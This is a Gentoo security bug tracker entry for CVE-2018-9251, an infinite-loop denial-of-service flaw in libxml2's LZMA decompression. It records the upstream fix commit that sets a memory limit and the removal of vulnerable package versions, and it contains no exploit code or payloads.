Bug 655626 (CVE-2018-9251)

Summary:	<dev-libs/libxml2-2.9.8: memory consumption flaw in LZMA decompression (DoS)
Product:	Gentoo Security	Reporter:	D'juan McDonald (domhnall) <flopwiki>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	minor	CC:	gnome
Priority:	Normal
Version:	unspecified
Hardware:	All
OS:	Linux
URL:	https://bugzilla.gnome.org/show_bug.cgi?id=794914
Whiteboard:	C3 [noglsa cve]
Package list:		Runtime testing required:	---

Description D'juan McDonald (domhnall) 2018-05-13 06:10:57 UTC

(https://nvd.nist.gov/vuln/detail/CVE-2018-9251):

The xz_decomp function in xzlib.c in libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035.

Reference:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895195

Comment 1 D'juan McDonald (domhnall) 2018-05-28 21:18:30 UTC

commit e2a9122b8dde53d320750451e9907a7dcb2ca8bb (refs/bisect/bad)
Author: Nick Wellnhofer <wellnhofer@aevum.de>
Date:   Thu Sep 7 18:36:01 2017 +0200

    Set memory limit for LZMA decompression

    Otherwise malicious LZMA compressed files could consume large amounts
    of memory when decompressed.

    According to the xz man page, files compressed with `xz -9` currently
    require 65 MB to decompress, so set the limit to 100 MB.

    Should fix bug 786696.

$ git describe --contains e2a9122b8dde53d320750451e9907a7dcb2ca8bb
v2.9.6-rc1~7

@maintainer(s), ack if patch already applied with commits for 652976, please.

Comment 2 D'juan McDonald (domhnall) 2018-07-26 08:44:15 UTC

Vulnerable versions have been dropped via commit 2bea1ac35a4e6955517315078a2176c94cb4388d

Comment 3 Christopher Díaz Riveros (RETIRED) gentoo-dev

2018-07-26 08:48:01 UTC

We are done here it seems.


GLSA Vote: No.


Thank you,